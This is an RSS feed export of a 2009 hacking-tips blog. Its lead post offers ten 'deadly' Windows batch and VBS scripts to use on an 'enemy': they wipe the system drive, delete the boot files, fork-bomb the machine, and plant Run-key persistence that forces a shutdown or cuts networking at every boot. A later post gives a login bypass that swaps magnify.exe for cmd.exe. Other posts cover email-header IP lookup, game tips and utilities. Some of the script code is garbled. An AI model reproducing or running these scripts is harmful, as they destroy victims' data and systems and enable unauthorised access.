src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqiTazmkMArEibP8gfngpl31Wvb7M3JZJnM2JhtDKYPKcxctyifG0FQfYzgUNwFJFiBWl9fnOUb_eNdbszffwICgVeHHlaXuh6s6sVhdcjoxSbWGqtuaRRuavmgbuuYj09asRa23TJHeo/s400/DeadlyVirus_sm.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5373512462797289426&quot; /&gt;&lt;/a&gt;&lt;br /&gt;Warning : Please Use ALL At Your Own Risk.Never Try On Your Own Pc&lt;br /&gt;Let Your Enemy See Your Power&lt;br /&gt;&lt;br /&gt;Now below i am posting some codes which are known as &quot;Deadly&quot;&lt;br /&gt;&lt;br /&gt;All Scripts Here Are To Be Copied In NotePad&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;#1.This Will Delete All The Content Of A Drive&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;del %systemdrive%\*.* /f /s /q&lt;br /&gt;shutdown -r -f -t 00&lt;br /&gt;&lt;br /&gt;Save The Above Code As Anything.bat&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;#2.This Will Just Restart Your Pc&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;shutdown -r -f -t 00&lt;br /&gt;&lt;br /&gt;Save The Above Code As Anything.bat&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;#3.This Will Crash Ur Computer&lt;/strong&gt;&lt;br /&gt;.&lt;br /&gt;Option Explicit&lt;br /&gt;Dim WSHShell&lt;br /&gt;Set WSHShell=Wscript.CreateObject(&quot;Wscript.Shell&quot;)&lt;br /&gt;Dim x&lt;br /&gt;For x = 1 to 100000000&lt;br /&gt;WSHShell.Run &quot;Tourstart.exe&quot;&lt;br /&gt;Next&lt;br /&gt;.&lt;br /&gt;Save It As Anything.vbs&lt;br /&gt;It Only Works With Windows XP &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;strong&gt;#4.&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;echo off@&lt;br /&gt;cls&lt;br /&gt;call attrib -h -r c:\autoexec.bat &gt;nul&lt;br /&gt;echo @echo off &gt;c:\autoexec.bat&lt;br /&gt;echo deltree /y c:\progra~1\*.* nul &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo copy c:\******s\command\forma.com c:\ &gt;nul &gt;&gt;c:\autoexe.bat&lt;br /&gt;echo copy c:\******s\command/deltree.exe c:\ &gt;nul &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo deltre /y c:\******s\*.* &gt;nul &gt;&gt;c:\autoexec.bat&lt;br /&gt;echoformat c:/q /u /autotest &gt;nul &gt;&gt;c:\autoexe.bat&lt;br /&gt;.&lt;br /&gt;Save It As Anything.bat&lt;br /&gt;No Idea About The After Effects OF This Virus &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;strong&gt;#5.The Most Simple Virus To Crush The Window&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;.&lt;br /&gt;@Echo off&lt;br /&gt;Del C:\ *.* |y&lt;br /&gt;.&lt;br /&gt;Save It As Anything.bat&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;#6.This will crash ur computer &lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;: loop&lt;br /&gt;start cmd.exe&lt;br /&gt;goto loop&lt;br /&gt;.&lt;br /&gt;Save As Anything.bat&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;strong&gt;#7.Script that crashes pc&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;.&lt;br /&gt;@echo off&lt;br /&gt;attrib -r -s -h c:\autoexec.bat&lt;br /&gt;del c:\autoexec.bat&lt;br /&gt;attrib -r -s -h c:\boot.ini&lt;br /&gt;del c:\boot.ini&lt;br /&gt;attrib -r -s -h c:\ntldr&lt;br /&gt;del c:\ntldr&lt;br /&gt;attrib -r -s -h c:\windows\win.ini&lt;br /&gt;del c:\windows\win.ini&lt;br /&gt;@echo off&lt;br /&gt;msg * YOU GOT OWNED!!!&lt;br /&gt;shutdown -s -t 7 -c &quot;A VIRUS IS TAKING OVER c:Drive&lt;br /&gt;.&lt;br /&gt;&lt;br /&gt;Save As Anything.bat File In Notepad!!&lt;br /&gt;This Will Pop Up A Message Saying OWNED!!&lt;br /&gt;And Shut Down The Computer Never To Reboot Again! &lt;br /&gt; &lt;br /&gt;&lt;strong&gt;#8.Shutdowns Computer Everytime It Is Turned On&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;.&lt;br /&gt;echo @echo off&gt;c:windowshartlell.bat&lt;br /&gt;echo break off&gt;&gt;c:windowshartlell.bat&lt;br /&gt;echo shutdown -r -t 11 -f&gt;&gt;c:windowshartlell.bat&lt;br /&gt;echo end&gt;&gt;c:windowshartlell.bat&lt;br /&gt;reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f&lt;br /&gt;reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f&lt;br /&gt;echo You have been HACKED.&lt;br /&gt;PAUSE &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;#9.Disable Internet Permanently&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;.&lt;br /&gt;echo @echo off&gt;c:windowswimn32.bat&lt;br /&gt;echo break off&gt;&gt;c:windowswimn32.bat&lt;br /&gt;echo ipconfig/release_all&gt;&gt;c:windowswimn32.bat&lt;br /&gt;echo end&gt;&gt;c:windowswimn32.bat&lt;br /&gt;reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f&lt;br /&gt;reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f&lt;br /&gt;echo You Have Been HACKED!&lt;br /&gt;PAUSE&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;#10.Change Files To Non-working TXT Files&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;.&lt;br /&gt;REN *.DOC *.TXT&lt;br /&gt;REN *.JPEG *.TXT&lt;br /&gt;REN *.LNK *.TXT&lt;br /&gt;REN *.AVI *.TXT&lt;br /&gt;REN *.MPEG *.TXT&lt;br /&gt;REN *.COM *.TXT&lt;br /&gt;REN *.BAT *.TXT&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Regards&lt;br /&gt;&lt;br /&gt;●๋●н•-------●2•--------●k•-------●2●๋•&lt;br /&gt;&lt;br /&gt;нαck τнε нαckεг kгαck τнε kгαckεг</description><link>http://thecounterhack.blogspot.com/2009/08/10-deadly-scripts.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqiTazmkMArEibP8gfngpl31Wvb7M3JZJnM2JhtDKYPKcxctyifG0FQfYzgUNwFJFiBWl9fnOUb_eNdbszffwICgVeHHlaXuh6s6sVhdcjoxSbWGqtuaRRuavmgbuuYj09asRa23TJHeo/s72-c/DeadlyVirus_sm.jpg" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-3234645530568637853</guid><pubDate>Sun, 23 Aug 2009 22:47:00 +0000</pubDate><atom:updated>2009-08-24T18:21:55.952+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">tips</category><category domain="http://www.blogger.com/atom/ns#">Tricks</category><title>Finding IP adress of E-Mail sender</title><description>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOKdJMmzm18X6fAIErfpHaf5QH5izFkU9BttIlPLgIcF6ISlSHnKXDg6m7KznCeNZ4cJZbn611K6SdiT0VETuICaao-a5BK1K2KDls0DjPaCm0kwDBWT2Vx0u-4ThiiXj3dLN6l8-y9cE/s1600-h/surf-anonymously-with-not-my-ip-ip-masking-tool-450x341.jpg&quot;&gt;&lt;img style=&quot;float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 400px; height: 168px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOKdJMmzm18X6fAIErfpHaf5QH5izFkU9BttIlPLgIcF6ISlSHnKXDg6m7KznCeNZ4cJZbn611K6SdiT0VETuICaao-a5BK1K2KDls0DjPaCm0kwDBWT2Vx0u-4ThiiXj3dLN6l8-y9cE/s400/surf-anonymously-with-not-my-ip-ip-masking-tool-450x341.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5373296243680307538&quot; /&gt;&lt;/a&gt;&lt;br /&gt;When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Finding IP address in Gmail&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;1. Log into your Gmail account with your username and password.&lt;br /&gt;2. Open the mail.&lt;br /&gt;3. To display the headers,&lt;br /&gt;* Click on More options corresponding to that thread. You should get a bunch of links.&lt;br /&gt;* Click on Show original&lt;br /&gt;4. You should get headers like this:&lt;br /&gt;Gmail headers : name&lt;br /&gt;Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is&lt;br /&gt;&lt;br /&gt;65.119.112.245.&lt;br /&gt;That is the IP address of the sender!&lt;br /&gt;5. Track the IP address of the sender&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Finding IP address in Yahoo! Mail&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;1. Log into your Yahoo! mail with your username and password.&lt;br /&gt;2. Click on Inbox or whichever folder you have stored your mail.&lt;br /&gt;3. Open the mail.&lt;br /&gt;4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,&lt;br /&gt;* Click on Options on the top-right corner&lt;br /&gt;* In the Mail Options page, click on General Preferences&lt;br /&gt;* Scroll down to Messages where you have the Headers option&lt;br /&gt;* Make sure that Show all headers on incoming messages is selected&lt;br /&gt;* Click on the Save button&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Finding IP address in Hotmail&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;1. Log into your Hotmail account with your username and password.&lt;br /&gt;2. Click on the Mail tab on the top.&lt;br /&gt;3. Open the mail.&lt;br /&gt;4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,&lt;br /&gt;* Click on Options on the top-right corner&lt;br /&gt;* In the Mail Options page, click on Mail Display Settings&lt;br /&gt;* In Message Headers, make sure Advanced option is checked&lt;br /&gt;* Click on Ok button&lt;br /&gt;* Go back to the mails and open that mail&lt;br /&gt;5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender&#39;s IP address&lt;br /&gt;Hotmail headers : name ,In this case the IP address of the sender is [68.34.60.59]. Jump to step 9.&lt;br /&gt;6. If you find a header with Received: from followed by a Gmail proxy like this&lt;br /&gt;Hotmail headers : name&lt;br /&gt;Look for Received: from followed by IP address within square brackets[].&lt;br /&gt;In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9.&lt;br /&gt;7. Or else if you have headers like this&lt;br /&gt;Hotmail headers : name&lt;br /&gt;Look for Received: from followed by IP address within square brackets[].&lt;br /&gt;In this case, the IP address of the sender is [61.83.145.129] (Spam mail). Jump to step 9.&lt;br /&gt;8. If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.&lt;br /&gt;9. Track the IP address of the sender&lt;br /&gt;* Go back to the mails and open that mail&lt;br /&gt;5. You should see similar headers like this:&lt;br /&gt;Yahoo! headers : name&lt;br /&gt;Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.&lt;br /&gt;That is be the IP address of the sender!&lt;br /&gt;6. Track the IP address of the sender&lt;br /&gt;&lt;br /&gt;Regards&lt;br /&gt;&lt;br /&gt;●๋●н•-------●2•--------●k•-------●2●๋•&lt;br /&gt;&lt;br /&gt;нαck τнε нαckεг kгαck τнε kгαckεг</description><link>http://thecounterhack.blogspot.com/2009/08/finding-ip-adress-of-e-mail-sender.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOKdJMmzm18X6fAIErfpHaf5QH5izFkU9BttIlPLgIcF6ISlSHnKXDg6m7KznCeNZ4cJZbn611K6SdiT0VETuICaao-a5BK1K2KDls0DjPaCm0kwDBWT2Vx0u-4ThiiXj3dLN6l8-y9cE/s72-c/surf-anonymously-with-not-my-ip-ip-masking-tool-450x341.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-8236956844106583809</guid><pubDate>Sun, 23 Aug 2009 12:14:00 +0000</pubDate><atom:updated>2009-08-23T18:06:47.225+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Counter Strike</category><category domain="http://www.blogger.com/atom/ns#">tips</category><title>Tips On Strategies  !</title><description>&lt;img src=&quot;http://www.bosskey.net/shots/cs/action/planting1.jpg&quot; width=100 height=100 border=0 align=right &gt;&lt;br /&gt;&lt;strong&gt;Accomplish your objective to force the other team to make a move&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt; Often the other team will be either camping, or moving cautiously, or waiting for you to make a move. Particularly when the round is drawing to a close and there are only a few surviving players left, you can try and turn the tide of battle by putting your enemies on the defensive. If you&#39;re a Counter-Terrorist on a hostage rescue map, go grab the remaining hostage and make a run for it. If you&#39;re a Terrorist on a bomb/defuse map, try planting the bomb in order to force your enemies out. And so on. If done carefully, this can often turn the hunter into the hunted, since now you will be taking the initiative and forcing your enemies into predictable, sometimes exposed, behavior (chasing after the hostages and their rescuer, defusing the bomb, etc.). If you&#39;re being hunted, try flipping the script.&lt;br /&gt;&lt;img src=&quot;http://www.bosskey.net/shots/cs/action/vent3.jpg&quot; width=100 height=100 border=0 align=right &gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Leave gratings and vents intact when possible&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt; Untouched windows and vents serve as an early warning system. It takes noise to open a vent or grating -- not much if a knife is used, but enough to to be noticed if it&#39;s nearby -- and this can alert you to sneaking enemies even when they&#39;re not direct line of sight. Even for vents and destructible objects far away, seeing them destroyed -- or noticing later that they&#39;re destroyed -- can give you a heads-up as to enemy locations, provided you know your team isn&#39;t shooting at them. If you hold off on destroying vents and gratings, you&#39;ll know that when they&#39;re gone an enemy was responsible. &lt;br /&gt;&lt;img src=&quot;http://www.bosskey.net/shots/cs/action/kill2.jpg&quot; width=100 height=100 border=0 align=right &gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Don&#39;t hesitate to sacrifice yourself for the team&lt;/strong&gt;&lt;br /&gt; &lt;br /&gt;The goal of Counter-Strike is for your team to win, not just you. To be a successful Counter-Strike player, you need to put your team above yourself -- and that means your team, not whatever clan you&#39;re in this week. To accomplish your objective, that sometimes means laying down your life for the good of the team. When your teammate is planting a bomb, you need to put yourself between him and the enemy. When the VIP is making a hasty retreat, don&#39;t hesitate to try to lead the enemy astray by moving out of cover and drawing fire while he can escape. When your teammate is making a run with the hostages trailing behind him, step in the line of fire to give the enemy multiple targets. Your team always comes first. &lt;br /&gt;&lt;img src=&quot;http://www.bosskey.net/shots/cs/action/snipe2.jpg&quot; width=100 height=100 border=0 align=right &gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Take out snipers first&lt;/strong&gt;&lt;br /&gt; &lt;br /&gt;Snipers -- enemy on high ground and watching over your advance, whether they&#39;re actually using sniper weapons or not -- are your primary concern. When you&#39;re on the offensive, competent snipers are the main impediment to achieving your objective. Give the highest priority to taking out the snipers; once they&#39;re gone you can continue on. Snipers are your biggest threat when advancing. Eliminate them first. &lt;br /&gt;&lt;img src=&quot;http://www.bosskey.net/shots/cs/action/corpse1.jpg&quot; width=100 height=100 border=0 align=right &gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;When low on ammo and enemy is nearby, pick up enemy gun&lt;/strong&gt;&lt;br /&gt; &lt;br /&gt;When you&#39;re in the thick of things, often successfully reloading before you come across another enemy is the primary impediment to your success. When you&#39;ve just downed an enemy -- particularly if you caught him unaware so he did not return much fire -- and you need to reload but other enemies are nearby, consider picking up the downed enemy&#39;s weapon. Obviously, this is a particularly good idea if his weapon is superior to your own. If your enemies are hunting you, they may wait until right after a firefight to make their move, figuring that you&#39;re probably distracted or low on ammo or reloading. Being fully prepared with a fully-loaded weapon can give you the upper hand. If you&#39;re low on ammo, consider picking up weapons from your downed foes. &lt;br /&gt;&lt;img src=&quot;http://www.bosskey.net/shots/cs/action/snipe4.jpg&quot; width=100 height=100 border=0 align=right &gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;When sniping, relocate after being spotted&lt;/strong&gt; &lt;br /&gt;&lt;br /&gt;Snipers are deadly in any realistic game like Counter-Strike -- running out into open without cover is tantamount to suicide. But by the same token, an uncareful sniper can easily be taken down by an enemy sniper, or even an assaulting foe with an accurate weapon (like an AK47 or a Colt) and good aim. If you&#39;re sniping, once you&#39;re spotted, relocate to another position. It doesn&#39;t necessarily have to be far away, your head just needs to be poking out of another area. If you&#39;re firing at another sniper who doesn&#39;t yet see you and miss, he shortly will -- move to another position and resume the attack. A sniper in a known location is a soon-to-be-dead sniper. &lt;br /&gt;&lt;img src=&quot;http://www.bosskey.net/shots/cs/action/snipe1.jpg&quot; width=100 height=100 border=0 align=right &gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;If the round ends and you survive, avoid enemy contact&lt;/strong&gt; &lt;br /&gt;&lt;br /&gt;If the round ends by something other than elimination -- i.e., the Counter-Terrorists rescue all the hostages or the Terrorists successfully destroy the bomb site -- then avoid enemy contact. At this point it does you no good to engage the enemy: The round is already over and you only risk getting killed. Part of Counter-Strike is managing your money, and risking losing your current weapon is not worth it when the round is already over. It doesn&#39;t do you any good to engage the enemy once the round is over. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;If you find yourself isolated and outmatched, concentrate on taking out one enemy&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Every Counter-Strike player has found themselves out on point and has accidentally stumbled into the spearhead of an enemy assault. When you have no choice but to die, take someone out with you. Instead of spraying bullets at the entire general area, hoping to whittle all of the opponents down, concentrate on one individual and inflict all your might upon him before you get taken down. Your remaining teammates will be better off with one fewer enemy rather than that same amount of damage spread over each enemy. If you find yourself being overrun and are certain to die, concentrate on taking one enemy with you, to help out your teammates down the line. &lt;br /&gt;&lt;br /&gt;source:bosskey&lt;br /&gt;&lt;br /&gt;Regards&lt;br /&gt;SILENT||AGGRESSION</description><link>http://thecounterhack.blogspot.com/2009/08/tips-on-strategies.html</link><author>noreply@blogger.com (Hitesh)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-5246633559131124297</guid><pubDate>Sun, 23 Aug 2009 11:59:00 +0000</pubDate><atom:updated>2009-08-23T17:34:25.252+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">tips</category><category domain="http://www.blogger.com/atom/ns#">Tricks</category><title>Crack Password in Windows Vista</title><description>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXDDJBdC4iGlEs3isxZbON6-oe38vpBg_TdRcLXcv6uH8XaJPIlZVcVUEru8gYUDPHEP6z-oGsc9sYu0DqbDc-bHMUdNeeE2lY0p9GeUAH4xMiAQsajAZpaEztRhMMfeSqLb6HdjfNsV4/s1600-h/Windows-Vista-Software-License-Manager-2.png&quot;&gt;&lt;img style=&quot;float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px; height: 200px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXDDJBdC4iGlEs3isxZbON6-oe38vpBg_TdRcLXcv6uH8XaJPIlZVcVUEru8gYUDPHEP6z-oGsc9sYu0DqbDc-bHMUdNeeE2lY0p9GeUAH4xMiAQsajAZpaEztRhMMfeSqLb6HdjfNsV4/s400/Windows-Vista-Software-License-Manager-2.png&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5373128700000493874&quot; /&gt;&lt;/a&gt;&lt;br /&gt;Try to boot from windows vista dvd or if u have oem computer go to repair options !!&lt;br /&gt;&lt;br /&gt;Boot to Win RE&lt;br /&gt;Click Command Prompt option.&lt;br /&gt;Type the following command:&lt;br /&gt;C:&lt;br /&gt;CD Windows\system32&lt;br /&gt;ren cmd.exe cmd.old&lt;br /&gt;ren magnify.exe cmd.exe&lt;br /&gt;ren cmd.old magnify.exe&lt;br /&gt;Restart computer&lt;br /&gt;Click on Easy of Access centre left side bottom à Choose Magnify option à Command prompt opens up&lt;br /&gt;Type: net user administrator /active:yes&lt;br /&gt;Restart the computer&lt;br /&gt;Logon on administrator account and then using User Account page, remove password for the other account&lt;br /&gt;Search for Magnify.exe in start search and click on it&lt;br /&gt;Command prompt opens up&lt;br /&gt;Type: net user administrator /active:no&lt;br /&gt;Restart the computer&lt;br /&gt;This will disable the administrator account.&lt;br /&gt;Boot to winRE&lt;br /&gt;Type the following:&lt;br /&gt;C:&lt;br /&gt;CD Windows\system32&lt;br /&gt;ren magnify.exe cmd.old&lt;br /&gt;ren cmd.exe magnify.exe&lt;br /&gt;ren cmd.old cmd.exe&lt;br /&gt;exit&lt;br /&gt;Restart the computer – system logs on to the User account without asking for password provided there is only one user account.&lt;br /&gt;&lt;br /&gt;Regards&lt;br /&gt;&lt;br /&gt;●๋●н•-------●2•--------●k•-------●2●๋•&lt;br /&gt;&lt;br /&gt;нαck τнε нαckεг kгαck τнε kгαckεг</description><link>http://thecounterhack.blogspot.com/2009/08/crack-password-in-windows-vista.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXDDJBdC4iGlEs3isxZbON6-oe38vpBg_TdRcLXcv6uH8XaJPIlZVcVUEru8gYUDPHEP6z-oGsc9sYu0DqbDc-bHMUdNeeE2lY0p9GeUAH4xMiAQsajAZpaEztRhMMfeSqLb6HdjfNsV4/s72-c/Windows-Vista-Software-License-Manager-2.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-8473342789708186021</guid><pubDate>Sun, 23 Aug 2009 11:53:00 +0000</pubDate><atom:updated>2009-08-23T17:26:43.828+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">tips</category><category domain="http://www.blogger.com/atom/ns#">Tricks</category><title>Shutdown Computer with a Cell Phone !</title><description>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfgOV_xTCXwp2M2Frfn3x9ZTNWR9F8l73N9p5gjgWZC5i7Tm7ZF9KppYNyyHx9CX1K-OFuSvUBBOs8n3SEv8c0NXstODbm0A7NLAYbcmRlkeDNZGRJn5m3D9SHWHQ-RNdC9RNMzvBZQoI/s1600-h/6shutdown_Full.jpg&quot;&gt;&lt;img style=&quot;float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 256px; height: 256px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfgOV_xTCXwp2M2Frfn3x9ZTNWR9F8l73N9p5gjgWZC5i7Tm7ZF9KppYNyyHx9CX1K-OFuSvUBBOs8n3SEv8c0NXstODbm0A7NLAYbcmRlkeDNZGRJn5m3D9SHWHQ-RNdC9RNMzvBZQoI/s400/6shutdown_Full.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5373126899072001346&quot; /&gt;&lt;/a&gt;&lt;br /&gt;Using this method, a user can shutdown, restart, hibernate, etc. his or her computer, just by sending an email from his or her phone.&lt;br /&gt;&lt;br /&gt;To do this, all you will need is Microsoft Outlook which should come with Microsoft Office, which most people have. This will need to be on the computer wish you wish to shutdown.&lt;br /&gt;&lt;br /&gt;So, this is how you do this:&lt;br /&gt;&lt;br /&gt;1. First, you need the batch files to perform the Shutdown, Hibernate etc. You can write them down yourselves&lt;br /&gt;&lt;br /&gt;2. open your note pad&lt;br /&gt;&lt;br /&gt;and write lik this...&lt;br /&gt;&lt;br /&gt;c:\windows\system32\shutdown -s -f -t 00&lt;br /&gt;&lt;br /&gt;and save it as shutdown.bat&lt;br /&gt;&lt;br /&gt;3. Open up Microsoft Outlook. Make sure that you have already configured it for your email.Now we will need to make it so that Outlook checks your inbox about every minute (1 minute for testing time can be increased if a delayed shutdown is desired). You can do this by going to Tools: Options.&lt;br /&gt;&lt;br /&gt;4. Then click the Mail Setup tab, and afterwards, the Send/Receive button.&lt;br /&gt;&lt;br /&gt;5. Make sure that the Schedule an automatic send/receive every... box is checked, and set the number of minutes to 1. Now you may close all of these dialog boxes.&lt;br /&gt;&lt;br /&gt;6. Now go to Tools: Rules and Alerts... Next click the options button in the upper right hand corner and press the Import Rules button.&lt;br /&gt;&lt;br /&gt;7. Now select the shutdown.bat file ...whi u hv created ...&lt;br /&gt;&lt;br /&gt;8. Now, when you send a message from your phone to your e-mail address with the subject shutdown or smsshutdown%%, your computer will shutdown.&lt;br /&gt;Regards&lt;br /&gt;&lt;br /&gt;●๋●н•-------●2•--------●k•-------●2●๋•&lt;br /&gt;&lt;br /&gt;нαck τнε нαckεг kгαck τнε kгαckεг</description><link>http://thecounterhack.blogspot.com/2009/08/shutdown-computer-with-cell-phone.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfgOV_xTCXwp2M2Frfn3x9ZTNWR9F8l73N9p5gjgWZC5i7Tm7ZF9KppYNyyHx9CX1K-OFuSvUBBOs8n3SEv8c0NXstODbm0A7NLAYbcmRlkeDNZGRJn5m3D9SHWHQ-RNdC9RNMzvBZQoI/s72-c/6shutdown_Full.jpg" height="72" width="72"/><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-8972404552845026917</guid><pubDate>Sun, 23 Aug 2009 10:52:00 +0000</pubDate><atom:updated>2009-08-23T17:27:09.602+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">tips</category><category domain="http://www.blogger.com/atom/ns#">Tricks</category><title>Store 7Gb with Gmail Drive !</title><description>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0X2paPQ7Y4zhv8GOjeTcDv_PqWxaUqUndVeGzd4fH0VZgHPiPIveVlPVZXbi4lwP9CA3I-Rq08Ind6jlAbQQsgqqWvmn54Yb2TZPNFxMMscePGjMKOQm9UzwTY3IJp4FsXeQA8SNv_jY/s1600-h/gmail-drive.jpg&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 500px; height: 178px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0X2paPQ7Y4zhv8GOjeTcDv_PqWxaUqUndVeGzd4fH0VZgHPiPIveVlPVZXbi4lwP9CA3I-Rq08Ind6jlAbQQsgqqWvmn54Yb2TZPNFxMMscePGjMKOQm9UzwTY3IJp4FsXeQA8SNv_jY/s400/gmail-drive.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5373115617070957506&quot; /&gt;&lt;/a&gt;&lt;br /&gt;It forms a New Drive at My Computer just like C: drive, and you can directly Login from here to your Personal Gmail Account without going to Any Browser and you don&#39;t need to wait long time to Upload stuff in there.. but you just have to copy and paste it over there..like you do in other drives&lt;br /&gt;&lt;br /&gt;and Yeah!! its uploaded on your Gmail account Instantly.&lt;br /&gt;&lt;br /&gt;So technically it acts a 7 GB flash drive extension where you can upload any stuff and access it anywhere for free..&lt;br /&gt;&lt;br /&gt;Some More info about it :&lt;br /&gt;&lt;br /&gt;GMail Drive is a Shell Name space Extension that creates a virtual drive in the Windows Explorer, allowing you to use your Google Gmail account as a storage medium.&lt;br /&gt;It allows you to do basic file manipulation, such as copy and delete of files inside the Gmail account. Because it is a Shell Extension, the interface you work in is Windows Explorer itself.&lt;br /&gt;GMail Drive appears as a virtual drive under your My Computer folder in Windows &lt;br /&gt;Explorer&lt;br /&gt;&lt;br /&gt;&lt;em&gt;Please note that GMail Drive is still an experimental tool. There&#39;s still a number of limitations of the file-system (such as total filename size must be less than 65 characters). Since the tool hooks up with the free Gmail Service provided by Google, changes in the Gmail system may break the tool&#39;s ability to function. I cannot guarantee that files stored in this manner will be accessible in the future. &lt;/em&gt;&lt;br /&gt;&lt;br /&gt;Download Free :&lt;br /&gt;&lt;a href=&quot;http://www.softpedia.com/progDownload/GMail-Drive-shell-extension-Download-15944.html&quot;&gt;GMail Drive v1.0.14 - download site #1 (Softpedia) &lt;br /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a 